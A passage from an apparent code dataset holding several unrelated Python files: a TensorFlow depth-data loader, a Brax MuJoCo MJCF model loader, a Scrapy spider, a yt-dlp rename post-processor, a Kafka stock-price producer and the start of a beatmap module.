self._read_row(row, phase, augs),\n batch_size=batch_size,\n num_parallel_batches=_FLAGS.num_parallel_batches\n ))\n batch_stream = data_pool.make_one_shot_iterator().get_next()\n\n print(\"Stream generated... \" + key + '_phase_' + suffix)\n self._streams[key + '_phase_' + suffix] = batch_stream\n\n def _read_row(self, csv_row, phase, augs):\n def _pre_processing(stream, phase):\n def _random_crop(stream):\n x, y = stream\n assert x.shape == (_FLAGS.dim_dataset_h, _FLAGS.dim_dataset_w, 3)\n assert x.shape[0] == y.shape[0] and x.shape[1] == y.shape[1]\n size_h, size_w = (_FLAGS.dim_dataset_h, _FLAGS.dim_dataset_w)\n off_w = _tf.cast(_tf.random_uniform([], 0, size_w - _FLAGS.dim_input_w), _tf.int32)\n off_h = _tf.cast(_tf.random_uniform([], 0, size_h - _FLAGS.dim_input_h), _tf.int32)\n\n try:\n _x = _tf.image.crop_to_bounding_box(x, offset_height=off_h, offset_width=off_w,\n target_width=_FLAGS.dim_input_w,\n target_height=_FLAGS.dim_input_h)\n _y = _tf.image.crop_to_bounding_box(y, offset_height=off_h, offset_width=off_w,\n target_width=_FLAGS.dim_input_w,\n target_height=_FLAGS.dim_input_h)\n x = _x\n y = _y\n except Exception as e:\n print(e)\n\n return x, y\n\n # def _center_crop(stream):\n # x, y = stream\n # assert x.shape == (_FLAGS.dim_dataset_h, _FLAGS.dim_dataset_w, 3)\n # assert x.shape[0] == y.shape[0] and x.shape[1] == y.shape[1]\n # size_h, size_w = (_FLAGS.dim_input_h, _FLAGS.dim_input_w)\n #\n # try:\n # _x = _tf.image.resize_image_with_crop_or_pad(x, size_h, size_w)\n # _y = _tf.image.resize_image_with_crop_or_pad(y, size_h, size_w)\n #\n # x = _x\n # y = _y\n # except Exception as e:\n # print(e)\n #\n # return x, y\n\n if phase == _FLAGS.phase_train:\n if str(_FLAGS.type).startswith(\"KITTI\"):\n return _random_crop(stream)\n else:\n return stream\n elif phase == _FLAGS.phase_eval or phase == _FLAGS.phase_sampling or phase==_FLAGS.phase_ipiu:\n return stream\n else:\n raise AttributeError(phase)\n\n rgb_name, gt_name = _tf.decode_csv(csv_row, record_defaults=[[\"\"], [\"\"]])\n rgb_img = self._load_img(rgb_name, channels=3)\n gt_img = self._load_img(gt_name)\n\n (rgb_img, gt_img) = _augmentation.augment((rgb_img, gt_img), augs)\n (rgb_img, gt_img) = _pre_processing((rgb_img, gt_img), phase)\n\n return rgb_img, gt_img\n\n def _load_img(self, filename, channels=1):\n file = _tf.read_file(filename)\n if channels == 3:\n image = _tf.image.decode_jpeg(file, channels)\n image = _tf.cast(image, _tf.float32)\n elif channels == 1:\n\n if str(_FLAGS.type).startswith(\"KITTI\"):\n image = _tf.image.decode_png(file, channels, dtype=_tf.uint16)\n image = _tf.cast(image, _tf.float32)\n image = image / 256.0\n image = _tf.where(_tf.less_equal(image, 0.0), -_tf.ones_like(image), image)\n image = _tf.where(_tf.greater_equal(image, _FLAGS.GT_maxima), _tf.ones_like(image) * _FLAGS.GT_maxima,\n image)\n elif str(_FLAGS.type).startswith(\"NYU\"):\n image = _tf.image.decode_png(file, channels)\n image = _tf.cast(image, _tf.float32)\n image = image / 256.0 * _FLAGS.GT_maxima\n else:\n image = _tf.image.decode_png(file, channels)\n image = _tf.cast(image, _tf.float32)\n else:\n return\n image = _tf.image.resize_images(image,\n (_FLAGS.dim_dataset_h, _FLAGS.dim_dataset_w))\n return image\n\n def get_stream_names(self):\n return list(self._streams.keys())\n\n def get_stream_batch(self, sess, phase, stream_name='trainset'):\n try:\n if phase == _FLAGS.phase_train:\n stream_name += '_phase_train'\n elif phase == _FLAGS.phase_eval:\n stream_name += '_phase_eval'\n elif phase == _FLAGS.phase_sampling:\n stream_name += '_phase_sampling'\n\n stream = self._streams[stream_name]\n except KeyError:\n if sess is not None:\n sess.close()\n raise _tf.errors.InternalError(None, None, message=\"Stream named '%s' doesn't exists\" % stream_name)\n\n if sess is not None:\n for retries in range(1, 6):\n try:\n input, label = sess.run(stream)\n except KeyboardInterrupt:\n sess.close()\n raise _tf.errors.CancelledError(None, None, message=\"KeyboardInterrupt\")\n except:\n _logging.warning('\\nGet trainset on batch', 'retry...({})'.format(retries))\n continue\n else:\n return input, label\n raise _tf.errors.DataLossError(None, None, message='Retries expired')\n else:\n return stream\n\n pass\n","repo_name":"SpatialPerceptionNeuralNetwork/Achilles","sub_path":"dataset/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":7845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73433243712","text":"\"\"\"\nIn this class the Engineer person is created.\n\nIt is inherited from the Worker person.\n\"\"\"\n\nfrom dataclasses import dataclass\nfrom src import worker\n\n@dataclass\nclass Engineer(worker.Worker):\n __type: str # type of work\n __company: str # company where the person works.\n __has_master: bool # checks if it has a master degree.\n __has_doctorate: bool # checks if it has a doctorated degree. \n\n @property\n def type(self): # Getter of __type\n return self.__type \n\n @type.setter # Setter of __type\n def type(self, setType):\n self.__type = setType\n\n @property\n def company(self): # Getter of __company\n return self.__company\n\n @company.setter # # Setter of __company\n def company(self, setCompany):\n self.__company = setCompany\n\n def talk(self): # Method to print information about the certain person\n print(\"Hello! I am {} {}, I am a {} engineer that works {} a week at {} and I have a salary of {}.\".format(self.firstName,\n self.lastName,self.type,self.weeklyHours,self.company,self.salary))\n print(\"I have a master degree: {}\".format(self.__has_master))\n print(\"I have a doctorate degree: {}\\n\".format(self.__has_doctorate))","repo_name":"Jeziel18/OOP-Person-Task","sub_path":"src/engineer.py","file_name":"engineer.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5919064029","text":"from scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\n\nfrom sosobaike.items import SosobaikeItem\n\nclass SosobkSpider(BaseSpider):\n name = \"sosobk\"\n allowed_domains = [\"soso.com\"]\n start_urls = []\n# start_urls = (\n# 'http://www.soso.com/',\n# )\n\n def __init__(self):\n for i in range(0, 5000):\n url = \"http://baike.soso.com/Search.e?sp=S&sp=F&sp=S%E4%BA%BA%E7%89%A9&p=\" + str(i)\n #url = \"http://baike.soso.com/Search.e?sp=S&sp=F&sp=S%E4%BA%92%E8%81%94%E7%BD%91&p=\" + str(i)\n self.start_urls.append(url)\n\n def parse(self, response):\n hxs = HtmlXPathSelector(response)\n urllist = hxs.select(\"//div[@class='newscont wh_550']/font/a/@href\").extract()\n items = []\n for url in urllist:\n item = SosobaikeItem()\n item['url'] = 'http://baike.soso.com' + url\n items.append(item)\n\n return items\n","repo_name":"rchardzhu/sosobaike","sub_path":"sosobaike/sosobaike/spiders/sosobk.py","file_name":"sosobk.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"72475261631","text":"import itertools\nfrom typing import Dict, List, Tuple, TypeVar, Union\nimport warnings\nfrom xml.etree import ElementTree\n\nfrom brax.v2.base import (\n Actuator,\n Box,\n Capsule,\n Convex,\n DoF,\n Geometry,\n Inertia,\n Link,\n Mesh,\n Motion,\n Plane,\n Sphere,\n System,\n Transform,\n)\nfrom brax.v2.geometry import mesh as geom_mesh\nfrom etils import epath\nfrom jax import numpy as jp\nfrom jax.tree_util import tree_map\nimport mujoco\nimport numpy as np\n\n\nGeom = TypeVar('Geom', bound=Geometry)\n\n\n# map from mujoco geom_type to brax geometry string\n_GEOM_TYPE_CLS = {0: Plane, 2: Sphere, 3: Capsule, 6: Box, 7: Mesh}\n\n# map from mujoco joint type to brax joint type string\n_JOINT_TYPE_STR = {\n 0: 'f', # free\n 1: 'b', # ball\n 2: 'p', # prismatic\n 3: 'r', # revolute\n}\n\n# map from mujoco bias type to brax actuator type string\n_ACT_TYPE_STR = {\n 0: 'm', # motor\n 1: 'p', # position\n}\n\n_COLLIDABLES = [\n # ((Geometry, is_static), (Geometry, is_static))\n ((Sphere, False), (Plane, True)),\n ((Sphere, False), (Sphere, False)),\n ((Sphere, False), (Capsule, False)),\n ((Sphere, False), (Box, False)),\n ((Sphere, False), (Mesh, False)),\n ((Capsule, False), (Plane, True)),\n ((Capsule, False), (Capsule, False)),\n ((Capsule, False), (Box, False)),\n ((Capsule, False), (Mesh, False)),\n ((Box, False), (Plane, True)),\n ((Box, False), (Box, False)),\n ((Box, False), (Mesh, False)),\n ((Mesh, False), (Plane, True)),\n ((Mesh, False), (Mesh, False)),\n]\n\n\ndef _fuse_bodies(elem: ElementTree.Element):\n \"\"\"Fuses together parent child bodies that have no joint.\"\"\"\n\n for child in list(elem): # we will modify elem children, so make a copy\n if child.tag == 'body' and 'joint' not in [e.tag for e in child]:\n cpos = child.attrib.get('pos', '0 0 0')\n cpos = np.fromstring(cpos, sep=' ')\n for grandchild in child:\n # TODO: might need to offset more than just body, geom\n if grandchild.tag in ('body', 'geom') and (cpos != 0).any():\n gcpos = grandchild.attrib.get('pos', '0 0 0')\n gcpos = np.fromstring(gcpos, sep=' ') + cpos\n gcpos = ' '.join('%f' % i for i in gcpos)\n grandchild.attrib['pos'] = gcpos\n elem.append(grandchild)\n elem.remove(child)\n _fuse_bodies(child)\n\n\ndef _get_meshdir(elem: ElementTree.Element) -> Union[str, None]:\n \"\"\"Gets the mesh directory specified by the mujoco compiler tag.\"\"\"\n elem = elem.find('./mujoco/compiler')\n return elem.get('meshdir') if elem is not None else None\n\n\ndef _find_assets(\n elem: ElementTree.Element,\n path: Union[str, epath.Path],\n meshdir: Union[str, None] = None,\n) -> Dict[str, bytes]:\n \"\"\"Loads assets from an xml given a base path.\"\"\"\n assets = {}\n path = epath.Path(path)\n meshdir = meshdir or _get_meshdir(elem)\n fname = elem.attrib.get('file') or elem.attrib.get('filename')\n if fname:\n dirname = path if path.is_dir() else path.parent\n assets[fname] = (dirname / (meshdir or '') / fname).read_bytes()\n\n for child in list(elem):\n assets.update(_find_assets(child, path, meshdir))\n\n return assets\n\n\ndef _get_mesh(mj: mujoco.MjModel, i: int) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"Gets mesh from mj at index i.\"\"\"\n last = (i + 1) >= mj.nmesh\n face_start = mj.mesh_faceadr[i]\n face_end = mj.mesh_faceadr[i + 1] if not last else mj.mesh_face.shape[0]\n face = mj.mesh_face[face_start:face_end]\n\n vert_start = mj.mesh_vertadr[i]\n vert_end = mj.mesh_vertadr[i + 1] if not last else mj.mesh_vert.shape[0]\n vert = mj.mesh_vert[vert_start:vert_end]\n\n return vert, face\n\n\ndef _get_name(mj: mujoco.MjModel, i: int) -> str:\n names = mj.names[i:].decode('utf-8')\n return names[: names.find('\\x00')]\n\n\ndef _get_custom(mj: mujoco.MjModel) -> Dict[str, np.ndarray]:\n \"\"\"Gets custom mjcf parameters for brax, with defaults.\"\"\"\n default = {\n 'vel_damping': (0.0, None),\n 'ang_damping': (0.0, None),\n 'baumgarte_erp': (0.1, None),\n 'elasticity': (0.0, 'geom'),\n 'constraint_stiffness': (2000.0, 'body'),\n 'constraint_damping': (150.0, 'body'),\n 'constraint_limit_stiffness': (1000.0, 'body'),\n 'constraint_ang_damping': (0.0, 'body'),\n }\n\n # get numeric default overrides\n for i, ni in enumerate(mj.name_numericadr):\n nsize = mj.numeric_size[i]\n name = _get_name(mj, ni)\n val = mj.numeric_data[mj.numeric_adr[i] : mj.numeric_adr[i] + nsize]\n typ = default[name][1] if name in default else None\n default[name] = (val, typ)\n\n custom = {}\n for name, (val, typ) in default.items():\n size = {'body': mj.nbody, 'geom': mj.ngeom}.get(typ)\n custom[name] = np.repeat(val, size) if size else np.array(val).squeeze()\n\n # get tuple custom overrides\n for i, ni in enumerate(mj.name_tupleadr):\n start, end = mj.tuple_adr[i], mj.tuple_adr[i] + mj.tuple_size[i]\n objtype = mj.tuple_objtype[start:end]\n name = _get_name(mj, ni)\n if not all(objtype[0] == objtype):\n raise NotImplementedError(\n f'All tuple elements \"{name}\" should have the same object type.'\n )\n if objtype[0] not in [1, 5]:\n raise NotImplementedError(\n f'Custom tuple \"{name}\" with objtype=={objtype[0]} is not supported.'\n )\n typ = {1: 'body', 5: 'geom'}[objtype[0]]\n if name in default and default[name][1] != typ:\n raise ValueError(\n f'Custom tuple \"{name}\" is expected to be associated with'\n f' the {default[name][1]} objtype.'\n )\n\n size = {1: mj.nbody, 5: mj.ngeom}[objtype[0]]\n default_val, _ = default.get(name, (0.0, None))\n arr = np.repeat(default_val, size)\n objid = mj.tuple_objid[start:end]\n objprm = mj.tuple_objprm[start:end]\n arr[objid] = objprm\n custom[name] = arr\n\n return custom\n\n\ndef _contact_geoms(geom_a: Geom, geom_b: Geom) -> Tuple[Geom, Geom]:\n \"\"\"Converts geometries for contact functions.\"\"\"\n if isinstance(geom_a, Box) and isinstance(geom_b, Box):\n geom_a = geom_mesh.box_hull(geom_a)\n geom_b = geom_mesh.box_hull(geom_b)\n elif isinstance(geom_a, Box) and isinstance(geom_b, Mesh):\n geom_a = geom_mesh.box_hull(geom_a)\n geom_b = geom_mesh.convex_hull(geom_b)\n elif isinstance(geom_a, Mesh) and isinstance(geom_b, Box):\n geom_a = geom_mesh.convex_hull(geom_a)\n geom_b = geom_mesh.box_hull(geom_b)\n elif isinstance(geom_a, Mesh) and isinstance(geom_b, Mesh):\n geom_a = geom_mesh.convex_hull(geom_a)\n geom_b = geom_mesh.convex_hull(geom_b)\n elif isinstance(geom_a, Box):\n geom_a = geom_mesh.box_tri(geom_a)\n elif isinstance(geom_b, Box):\n geom_b = geom_mesh.box_tri(geom_b)\n\n # pad face vertices so that we can broadcast between geom_a and geom_b faces\n if isinstance(geom_a, Convex) and isinstance(geom_b, Convex):\n sa = geom_a.face.shape[-1]\n sb = geom_b.face.shape[-1]\n if sa < sb:\n face = np.pad(geom_a.face, ((0, 0), (0, sb - sa)), 'edge')\n geom_a = geom_a.replace(face=face)\n elif sb < sa:\n face = np.pad(geom_b.face, ((0, 0), (0, sa - sb)), 'edge')\n geom_b = geom_b.replace(face=face)\n\n return geom_a, geom_b\n\n\ndef _contacts_from_geoms(\n mj: mujoco.MjModel, geoms: List[Geom]\n) -> List[Tuple[Geom, Geom]]:\n \"\"\"Gets a list of contact geom pairs.\"\"\"\n collidables = []\n for key_a, key_b in _COLLIDABLES:\n if mj.opt.collision == 1: # only check predefined pairs in mj.pair_*\n geoms_ab = []\n for geom_id_a, geom_id_b in zip(mj.pair_geom1, mj.pair_geom2):\n geom_a, geom_b = geoms[geom_id_a], geoms[geom_id_b]\n static_a, static_b = geom_a.link_idx is None, geom_b.link_idx is None\n cls_a, cls_b = type(geom_a), type(geom_b)\n if (cls_a, static_a) == key_a and (cls_b, static_b) == key_b:\n geoms_ab.append((geom_a, geom_b))\n elif (cls_a, static_a) == key_b and (cls_b, static_b) == key_a:\n geoms_ab.append((geom_b, geom_a))\n elif key_a == key_b: # types match, avoid double counting (a, b), (b, a)\n geoms_a = [g for g in geoms if (type(g), g.link_idx is None) == key_a]\n geoms_ab = list(itertools.combinations(geoms_a, 2))\n else: # types don't match, take every permutation\n geoms_a = [g for g in geoms if (type(g), g.link_idx is None) == key_a]\n geoms_b = [g for g in geoms if (type(g), g.link_idx is None) == key_b]\n geoms_ab = list(itertools.product(geoms_a, geoms_b))\n if not geoms_ab:\n continue\n # filter out self-collisions\n geoms_ab = [(a, b) for a, b in geoms_ab if a.link_idx != b.link_idx]\n # convert the geometries so that they can be used for contact functions\n geoms_ab = [_contact_geoms(a, b) for a, b in geoms_ab]\n collidables.append(geoms_ab)\n\n # meshes with different shapes cannot be stacked, so we group meshes by vert\n # and face shape\n def key_fn(x):\n def get_key(x):\n if isinstance(x, Convex):\n return (x.vert.shape, x.face.shape, x.unique_edge.shape)\n if isinstance(x, Mesh):\n return (x.vert.shape, x.face.shape)\n return -1\n\n return get_key(x[0]), get_key(x[1])\n\n contacts = []\n for geoms_ab in collidables:\n geoms_ab = sorted(geoms_ab, key=key_fn)\n for _, g in itertools.groupby(geoms_ab, key=key_fn):\n geom_a, geom_b = tree_map(lambda *x: np.stack(x), *g)\n contacts.append((geom_a, geom_b))\n\n return contacts\n\n\ndef load_model(mj: mujoco.MjModel) -> System:\n \"\"\"Creates a brax system from a MuJoCo model.\"\"\"\n # do some validation up front\n if any(i not in [0, 1] for i in mj.actuator_biastype):\n raise NotImplementedError('Only actuator_biastype in [0, 1] are supported.')\n if mj.opt.integrator != 0:\n raise NotImplementedError('Only euler integration is supported.')\n if mj.opt.cone != 0:\n raise NotImplementedError('Only pyramidal cone friction is supported.')\n if not (mj.actuator_trntype == 0).all():\n raise NotImplementedError(\n 'Only joint transmission types are supported for actuators.'\n )\n\n custom = _get_custom(mj)\n\n # create links\n joint_positions = [np.array([0.0, 0.0, 0.0])]\n for _, group in itertools.groupby(\n zip(mj.jnt_bodyid, mj.jnt_pos), key=lambda x: x[0]\n ):\n position = np.array([p for _, p in group])\n if not (position == position[0]).all():\n raise RuntimeError('invalid joint stack: only one joint position allowed')\n joint_positions.append(position[0])\n joint_position = np.array(joint_positions)\n identity = np.tile(np.array([1.0, 0.0, 0.0, 0.0]), (mj.nbody, 1))\n link = Link(\n transform=Transform(pos=mj.body_pos, rot=mj.body_quat),\n inertia=Inertia(\n transform=Transform(pos=mj.body_ipos, rot=mj.body_iquat),\n i=np.array([np.diag(i) for i in mj.body_inertia]),\n mass=mj.body_mass,\n ),\n invweight=mj.body_invweight0[:, 0],\n joint=Transform(pos=joint_position, rot=identity),\n constraint_stiffness=custom['constraint_stiffness'],\n constraint_damping=custom['constraint_damping'],\n constraint_limit_stiffness=custom['constraint_limit_stiffness'],\n constraint_ang_damping=custom['constraint_ang_damping'],\n )\n # skip link 0 which is the world body in mujoco\n link = tree_map(lambda x: x[1:], link)\n\n # create dofs\n mj.jnt_range[~(mj.jnt_limited == 1), :] = np.array([-np.inf, np.inf])\n motions, limits, stiffnesses = [], [], []\n for typ, axis, limit, stiffness in zip(\n mj.jnt_type, mj.jnt_axis, mj.jnt_range, mj.jnt_stiffness\n ):\n if typ == 0:\n motion = Motion(ang=np.eye(6, 3, -3), vel=np.eye(6, 3))\n limit = np.array([-np.inf] * 6), np.array([np.inf] * 6)\n if stiffness > 0:\n raise RuntimeError('brax does not support stiffness for free joints')\n stiffness = np.zeros(6)\n elif typ == 1:\n motion = Motion(ang=np.eye(3), vel=np.zeros((3, 3)))\n if np.any(~np.isinf(limit)):\n raise RuntimeError('brax does not support joint ranges for ball joints')\n limit = np.array([-np.inf] * 3), np.array([np.inf] * 3)\n stiffness = np.zeros(3)\n elif typ == 2:\n motion = Motion(ang=np.zeros((1, 3)), vel=axis.reshape((1, 3)))\n limit = limit[0:1], limit[1:2]\n stiffness = np.array([stiffness])\n elif typ == 3:\n motion = Motion(ang=axis.reshape((1, 3)), vel=np.zeros((1, 3)))\n limit = limit[0:1], limit[1:2]\n stiffness = np.array([stiffness])\n else:\n raise RuntimeError(f'invalid joint type: {typ}')\n motions.append(motion)\n limits.append(limit)\n stiffnesses.append(stiffness)\n motion = tree_map(lambda *x: np.concatenate(x), *motions)\n\n limit = None\n if np.any(mj.jnt_limited):\n limit = tree_map(lambda *x: np.concatenate(x), *limits)\n stiffness = np.concatenate(stiffnesses)\n\n dof = DoF(\n motion=motion,\n armature=mj.dof_armature,\n stiffness=stiffness,\n damping=mj.dof_damping,\n limit=limit,\n invweight=mj.dof_invweight0,\n )\n\n # create geoms\n geoms = []\n for i, typ in enumerate(mj.geom_type):\n if typ not in _GEOM_TYPE_CLS:\n warnings.warn(f'unrecognized collider, geom_type: {typ}')\n continue\n\n kwargs = {\n 'link_idx': mj.geom_bodyid[i] - 1 if mj.geom_bodyid[i] > 0 else None,\n 'transform': Transform(pos=mj.geom_pos[i], rot=mj.geom_quat[i]),\n 'friction': mj.geom_friction[i, 0],\n 'elasticity': custom['elasticity'][i],\n }\n\n geom_cls = _GEOM_TYPE_CLS[typ]\n if geom_cls is Plane:\n geom = Plane(**kwargs)\n elif geom_cls is Sphere:\n geom = Sphere(radius=mj.geom_size[i, 0], **kwargs)\n elif geom_cls is Capsule:\n geom = Capsule(\n radius=mj.geom_size[i, 0], length=mj.geom_size[i, 1] * 2, **kwargs\n )\n elif geom_cls is Box:\n geom = Box(halfsize=mj.geom_size[i, :], **kwargs)\n elif geom_cls is Mesh:\n vert, face = _get_mesh(mj, mj.geom_dataid[i])\n geom = Mesh(vert=vert, face=face, **kwargs)\n geoms.append(geom)\n\n contacts = _contacts_from_geoms(mj, geoms)\n\n # create actuators\n ctrl_range = mj.actuator_ctrlrange\n ctrl_range[~(mj.actuator_ctrllimited == 1), :] = np.array([-np.inf, np.inf])\n actuator = Actuator(\n gear=mj.actuator_gear[:, 0],\n ctrl_range=ctrl_range,\n )\n\n # create non-pytree params. these do not live on device directly, and they\n # cannot be differentiated, but they do change the emitted control flow\n link_names = [_get_name(mj, i) for i in mj.name_bodyadr[1:]]\n # convert stacked joints to 1, 2, or 3\n link_types = ''\n for _, group in itertools.groupby(\n zip(mj.jnt_bodyid, mj.jnt_type), key=lambda x: x[0]\n ):\n typs = [t for _, t in group]\n if len(typs) == 1 and typs[0] == 0: # free\n typ = 'f'\n elif 0 in typs:\n raise RuntimeError('invalid joint stack: cannot stack free joints')\n elif 1 in typs:\n raise NotImplementedError('ball joints not supported')\n else:\n typ = str(len(typs))\n link_types += typ\n link_parents = tuple(mj.body_parentid - 1)[1:]\n\n # create non-pytree params for actuators.\n actuator_types = ''.join([_ACT_TYPE_STR[bt] for bt in mj.actuator_biastype])\n actuator_link_id = [mj.jnt_bodyid[i] - 1 for i in mj.actuator_trnid[:, 0]]\n unsupported_act_links = set(link_types[i] for i in actuator_link_id) - {\n '1',\n '2',\n '3',\n }\n if unsupported_act_links:\n raise NotImplementedError(\n f'Link types {unsupported_act_links} are not supported for actuators.'\n )\n actuator_qid = [mj.jnt_qposadr[i] for i in mj.actuator_trnid[:, 0]]\n actuator_qdid = [mj.jnt_dofadr[i] for i in mj.actuator_trnid[:, 0]]\n\n # mujoco stores free q in world frame, so clear link transform for free links\n if 'f' in link_types:\n free_idx = np.array([i for i, typ in enumerate(link_types) if typ == 'f'])\n link.transform.pos[free_idx] = np.zeros(3)\n link.transform.rot[free_idx] = np.array([1.0, 0.0, 0.0, 0.0])\n\n sys = System(\n dt=mj.opt.timestep,\n gravity=mj.opt.gravity,\n link=link,\n dof=dof,\n geoms=geoms,\n contacts=contacts,\n actuator=actuator,\n init_q=custom['init_qpos'] if 'init_qpos' in custom else mj.qpos0,\n vel_damping=custom['vel_damping'],\n ang_damping=custom['ang_damping'],\n baumgarte_erp=custom['baumgarte_erp'],\n link_names=link_names,\n link_types=link_types,\n link_parents=link_parents,\n actuator_types=actuator_types,\n actuator_link_id=actuator_link_id,\n actuator_qid=actuator_qid,\n actuator_qdid=actuator_qdid,\n solver_iterations=mj.opt.iterations,\n )\n\n sys = tree_map(jp.array, sys)\n\n return sys\n\n\ndef fuse_bodies(xml: str):\n \"\"\"Fuses together parent child bodies that have no joint.\"\"\"\n xml = ElementTree.fromstring(xml)\n _fuse_bodies(xml)\n return ElementTree.tostring(xml, encoding='unicode')\n\n\ndef loads(xml: str, asset_path: Union[str, epath.Path, None] = None) -> System:\n \"\"\"Loads a brax system from a MuJoCo mjcf xml string.\"\"\"\n elem = ElementTree.fromstring(xml)\n _fuse_bodies(elem)\n assets = {} if asset_path is None else _find_assets(elem, asset_path)\n xml = ElementTree.tostring(elem, encoding='unicode')\n mj = mujoco.MjModel.from_xml_string(xml, assets=assets)\n\n return load_model(mj)\n\n\ndef load(path: Union[str, epath.Path]):\n \"\"\"Loads a brax system from a MuJoCo mjcf file path.\"\"\"\n elem = ElementTree.fromstring(epath.Path(path).read_text())\n _fuse_bodies(elem)\n assets = _find_assets(elem, path)\n xml = ElementTree.tostring(elem, encoding='unicode')\n mj = mujoco.MjModel.from_xml_string(xml, assets=assets)\n\n return load_model(mj)\n","repo_name":"FloyedShen/Metaplasticity","sub_path":"Dependencies/brax/brax/v2/io/mjcf.py","file_name":"mjcf.py","file_ext":"py","file_size_in_byte":17395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"14794864282","text":"\"\"\"Post-processing module.\"\"\"\n\nfrom __future__ import annotations\nfrom yt_dlp.postprocessor.common import PostProcessor, PostProcessingError\nfrom pathlib import Path\nfrom typing import TYPE_CHECKING\nimport re\n\nif TYPE_CHECKING:\n from typing import Any\n\nclass RenameFixFilePP(PostProcessor):\n \"\"\"Renames a file.\"\"\"\n\n def run(self, info: dict[str, Any]):\n ext: str = '.' + info['ext']\n print(\"extension:\", ext)\n\n filepath: str = info['filepath']\n infile = Path('./' + filepath).resolve()\n\n def _re_sub(m: re.Match) -> str:\n if m[0] == ' ':\n return '_'\n return ''\n\n filepath = re.sub(r'[\\[\\]() ]', _re_sub, filepath)\n outfile = Path('./' + filepath).resolve()\n\n try:\n infile.rename(outfile)\n except FileNotFoundError as exc:\n raise PostProcessingError(str(exc))\n except PermissionError as exc:\n raise PostProcessingError(str(exc))\n\n info['filepath'] = outfile.name\n\n return [], info\n","repo_name":"JohnDevlopment/yt-dlp-tk","sub_path":"src/yt_dlp_tk/yt_funcs/postprocessing.py","file_name":"postprocessing.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11260575506","text":"import pandas as pd\nimport json\ndf = pd.read_csv('VNI-test.csv')\n\nlist_price = [\"Price\", \"Open\", \"High\", \"Low\"]\nfor i in list_price:\n df[i] = pd.to_numeric(df[i].apply(lambda x: x.replace(\",\", \"\")))\n\nBOOTSTRAP_SERVER = 'localhost'\nTOPIC = 'myTest'\n\nfrom kafka import KafkaProducer\nproducer = KafkaProducer(bootstrap_servers=[BOOTSTRAP_SERVER])\n\ncol = []\nfor i in range(0, 7):\n col.append(df.columns[i])\n\ndef send(tmp):\n '''s = \"\"\n for i in range(0,6):\n s = s + col[i] + \": \" + str(tmp[i]) + \"-\"'''\n s = {}\n for i in range(0, 7):\n s[col[i]] = tmp[i]\n print(\"Message: \", s)\n producer.send(TOPIC, value = json.dumps(s).encode('utf-8'))\n\nimport time\ntiming = 0.5\nfor i in range(df.shape[0]-1, -1, -1):\n tmp = list(df.loc[i])\n send(tmp)\n time.sleep(timing)\n","repo_name":"HungThinhLuu/OS_KSTN","sub_path":"Code_Streaming/kafka2topic.py","file_name":"kafka2topic.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"22470023553","text":"import numpy as np\nfrom . import utils\n\n\ndef scale(beatmap:np.ndarray, scale:float, log = True, integer = True) -> np.ndarray:\n if isinstance(scale, str): scale = utils._safer_eval(scale)\n assert scale>0, f\"scale should be > 0, your scale is {scale}\"\n if scale == 1: return beatmap\n else:\n import math\n if log is True: print(f'scale={scale}; ')\n a = 0\n b = np.array([], dtype=int)\n if scale%1==0:\n while a < len(beatmap):\n b = np.append(b, beatmap[int(a)])\n a += scale\n else:\n if integer is True:\n while a + 1 < len(beatmap):\n b = np.append(b, int((1 - (a % 1)) * beatmap[math.floor(a)] + (a % 1) * beatmap[math.ceil(a)]))\n a += scale\n else:\n while a + 1 < len(beatmap):\n b = np.append(b, (1 - (a % 1)) * beatmap[math.floor(a)] + (a % 1) * beatmap[math.ceil(a)])\n a += scale\n return b\n \ndef shift(beatmap:np.ndarray, shift:float, log = True, mode = 1) -> np.ndarray:\n if isinstance(shift, str): shift = utils._safer_eval(shift)\n if shift == 0: return beatmap\n # positive shift\n elif shift > 0:\n # full value of beats is removed from the beginning\n if shift >= 1: beatmap = beatmap[int(shift//1):]\n # shift beatmap by the decimal value\n if shift%1 != 0:\n shift = shift%1\n for i in range(len(beatmap) - int(shift) - 1):\n beatmap[i] = int(beatmap[i] + shift * (beatmap[i + 1] - beatmap[i]))\n\n # negative shift\n else:\n shift = -shift\n # full values are inserted in between first beats\n if shift >= 1:\n if mode == 1:\n step = int((beatmap[1] - beatmap[0]) / (int(shift//1) + 1))\n beatmap = np.insert(arr = beatmap, obj = 1, values = np.linspace(start = beatmap[0] + step - 1, stop = 1 + beatmap[1] - step, num = int(shift//1)))\n elif mode == 2:\n for i in range(int(shift//1)):\n beatmap = np.insert(arr = beatmap, obj = (i*2)+1, values = int((beatmap[i*2] + beatmap[(i*2)+1])/2))\n # shift beatmap by the decimal value\n if shift%1 != 0:\n shift = shift%1\n for i in reversed(range(len(beatmap))):\n if i==0: continue\n beatmap[i] = int(beatmap[i] - shift * (beatmap[i] - beatmap[i-1]))\n return beatmap\n\ndef generate(audio: np.ndarray, sr: int, lib='madmom.BeatDetectionProcessor', caching=True, filename: str = None, log = True, load_settings = True, split=None):\n \"\"\"Creates beatmap attribute with a list of positions of beats in samples.\"\"\"\n if log is True: print(f'Analyzing beats using {lib}; ', end='')\n\n # load a beatmap if it is cached:\n if caching is True and filename is not None:\n audio_id=hex(len(audio[0]))\n import os\n if not os.path.exists('beat_manipulator/beatmaps'):\n os.mkdir('beat_manipulator/beatmaps')\n cacheDir=\"beat_manipulator/beatmaps/\" + ''.join(filename.replace('\\\\', '/').split('/')[-1]) + \"_\"+lib+\"_\"+audio_id+'.txt'\n try: \n beatmap=np.loadtxt(cacheDir, dtype=int)\n if log is True: print('loaded cached beatmap.')\n except OSError: \n if log is True:print(\"beatmap hasn't been generated yet. Generating...\")\n beatmap = None\n\n #generate the beatmap\n if beatmap is None:\n if 'madmom' in lib.lower():\n from collections.abc import MutableMapping, 